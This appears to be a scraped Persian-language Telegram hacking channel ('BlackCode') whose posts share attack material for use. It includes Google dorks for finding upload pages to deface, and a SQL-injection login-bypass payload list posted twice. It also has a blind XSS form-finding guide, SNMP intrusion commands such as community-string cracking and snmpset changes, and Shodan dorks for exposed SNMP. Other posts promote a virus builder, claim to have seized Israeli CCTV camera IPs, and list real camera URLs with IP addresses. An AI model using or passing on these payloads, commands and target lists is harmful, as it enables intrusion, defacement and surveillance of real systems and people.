Dork
چند تا دورک برای پیدا کردن مسیر های آپلود سایت ها برای دیفیس به کار میاد ذخیره کن به دردت میخوره
inurl:upload filetype:php
inurl:file_upload.php
inurl:uploadfile
inurl:uploadfile site:*.com
intitle:"file upload" inurl:upload
inurl:/upload.asp
intitle:"Select file to upload"
inurl:admin inurl:upload
inurl:uploadimage
inurl:upload.aspx
0☠️0
@ir_blackcode
👍5❤1
گپ رو دسته بندی کنیم یا همین معمولی بمونه
Anonymous Poll
64%
اره همین خوبه
36%
نه برای هر موضوع دسته بندی کن
❤1
بیش ۱۸۰۰۰ دوربین مداربسته از سراسر اسرائیل بهدست آوردهایم و ادرس IP آنها را در اختیار شما قرار دادیم
#BlackCode
@ir_blackcode
#BlackCode
@ir_blackcode
❤6
ساخت ویروس بدون داشتن دانش برنامه نویسی💀👾
توضیحات : اگه دوست داری خودت ویروس بسازی ولی برنامه نویسی بلد نیستی این ابزار میتونه توی ساختنش بهت کمک کنه و میتونی آپشن هایی که در اختیارت میزاره ویروس بسازی👾👾
#Blackcode
@ir_blackcode
توضیحات : اگه دوست داری خودت ویروس بسازی ولی برنامه نویسی بلد نیستی این ابزار میتونه توی ساختنش بهت کمک کنه و میتونی آپشن هایی که در اختیارت میزاره ویروس بسازی👾👾
#Blackcode
@ir_blackcode
🔥4
سلام به همه
در رابطه با by pass صفحه لاگین ادمین بعضی از صفحات با بعضی از کلمات کیلیدی by pass میشن
لیست کلمات :
' or 1=1 limit 1 -- -+
'="or'
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
=——————————————————-=
#blackcode
➡️ @ir_blackcode
در رابطه با by pass صفحه لاگین ادمین بعضی از صفحات با بعضی از کلمات کیلیدی by pass میشن
لیست کلمات :
' or 1=1 limit 1 -- -+
'="or'
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
=——————————————————-=
#blackcode
➡️ @ir_blackcode
❤7
BlackCode | کد سیاه
سلام به همه در رابطه با by pass صفحه لاگین ادمین بعضی از صفحات با بعضی از کلمات کیلیدی by pass میشن لیست کلمات : ' or 1=1 limit 1 -- -+ '="or' or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'#…
اگه این پست ری اکشن هاش بالا بره
دورک های خفن برای پیدا کردن صفحات لاگین ادمین براتون میزارم👍😈
دورک های خفن برای پیدا کردن صفحات لاگین ادمین براتون میزارم👍😈
🔥7
BlackCode | کد سیاه
سلام به همه در رابطه با by pass صفحه لاگین ادمین بعضی از صفحات با بعضی از کلمات کیلیدی by pass میشن لیست کلمات : ' or 1=1 limit 1 -- -+ '="or' or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'#…
DORK ADMIN LOGIN.txt
283 B
👍4
اقا بلاخره گیت هابمون هم راه اندازی شد🥳
از این به بعد ابزار های خفن تر تو راهه 😈
github : https://github.com/IR-BlackCode
از این به بعد ابزار های خفن تر تو راهه 😈
github : https://github.com/IR-BlackCode
❤6🔥3
چطوری فرم های آسیب پذیر برای حمله Blind XSS پیدا کنیم ؟ 🤔 🧐
#آموزشی
| • چنل بلک کد💀•|
⚫️ @ir_blackcode
1. اول وارد وب سایت https://dorkking.blindf.com میشیم ⚡️⌨️
2. دامنه هدف رو بدون "https://" وارد میکنیم ⚡️🌐
3. رو Next کلیک میکنیم ⚡️ ⚪️
4. هر 5 تا دورک برای پیدا کردن فرم ها طراحی شدن ⚡️ 😎
#آموزشی
| • چنل بلک کد💀•|
⚫️ @ir_blackcode
🔥5
آموزش پروتکل SNMP و روش های نفوذ
🔹 SNMP چیست؟
SNMP (Simple Network Management Protocol)
پروتکلی در لایه Application است برای مدیریت و مانیتورینگ تجهیزات شبکه (روتر، سوئیچ، سرور...)
پورتها: 161 (درخواست/پاسخ) ، 162 (Trap)
اجزا:
Manager (NMS): نرمافزار مدیریت
Agent: روی دستگاه نصب است
MIB: پایگاه داده شامل OID ها
نسخهها:
v1 و v2c → ناامن (Community String ساده: public, private)
v3 → امن (رمزنگاری + احراز هویت)
---
🔹snmp مراحل تست نفوذ
1. شناسایی سرویس
nmap -sU -p 161 --script=snmp-info <IP>
→ گرفتن اطلاعات پایه (OS، اینترفیسها، uptime).
2. cra__ck Community String
onesixtyone -c dict.txt <IP>
→ تست رشتههای رایج مثل public و private.
3. استخراج اطلاعات (Enumeration)
snmpwalk -v2c -c public <IP>
→ نمایش جدول ARP، کاربران، Routing table و …
4. سوءاستفاده از دسترسی (Exploitation)
اگر Community String سطح Read-Write پیدا شود:
snmpset -v2c -c private <IP> <OID> type value
→ امکان تغییر پورتها یا تنظیمات دستگاه.
5. SNMPv3
امنتر است، اما اگر رمز ساده باشد قابل Brute Force:
snmpwalk -v3 -u admin -a SHA -A pass -x AES -X key <IP>
#آموزشی
#آموزش پروتکل SNMP
| • چنل بلک کد 💀•|
🔹 @ir_blackcode
🔥3
🔎 دُورکهای SNMP در Shodan
🎯 پورتها
port:161
port:162
→ پیدا کردن سیستمهایی که SNMP باز دارن.
---
🎯 پروتکل / سرویس
"SNMPv1"
"SNMPv2"
"SNMPv3"
→ فیلتر بر اساس نسخه SNMP.
---
🎯 ترکیب پورت + نسخه
port:161 "SNMPv2"
port:161 "SNMPv3"
---
🎯 فیلتر به کشور
port:161 country:IR
port:161 country:US
---
🎯 فیلتر به سازمان / ISP
port:161 org:"Cisco"
port:161 org:"Huawei"
---
🎯 مثالهای ترکیبی
port:161 "public"
port:161 "private"
#دورک
#Dork
| • بلک کد 💀•|
🔹 @ir_blackcode
🔥5
🤝5
👍5
🤝6
💀Google Durk Camera💀
Dork : inurl:/cgi-bin/guestimage.html
http://37.182.240.202:81/cgi-bin/guestimage.html
http://77.89.48.24:89/cgi-bin/guestimage.html
http://221.189.0.181/cgi-bin/guestimage.html
http://166.149.155.73:7001/cgi-bin/guestimage.html
http://130.180.86.233:1010/cgi-bin/guestimage.html
https://178.237.152.29/cgi-bin/guestimage.html
http://2.234.120.231:91/cgi-bin/guestimage.html
http://166.151.100.208:7001/cgi-bin/guestimage.html
http://153.142.220.112/cgi-bin/guestimage.html
http://166.151.98.221:7001/cgi-bin/guestimage.html
https://185.5.169.35/cgi-bin/guestimage.html
http://109.90.6.242/cgi-bin/guestimage.html
http://213.98.123.127:8050/cgi-bin/guestimage.html
http://77.145.244.11:83/cgi-bin/guestimage.html
http://89.106.143.18:122/cgi-bin/guestimage.html
.| بلک کد |.
@ir_blackcode
🔥6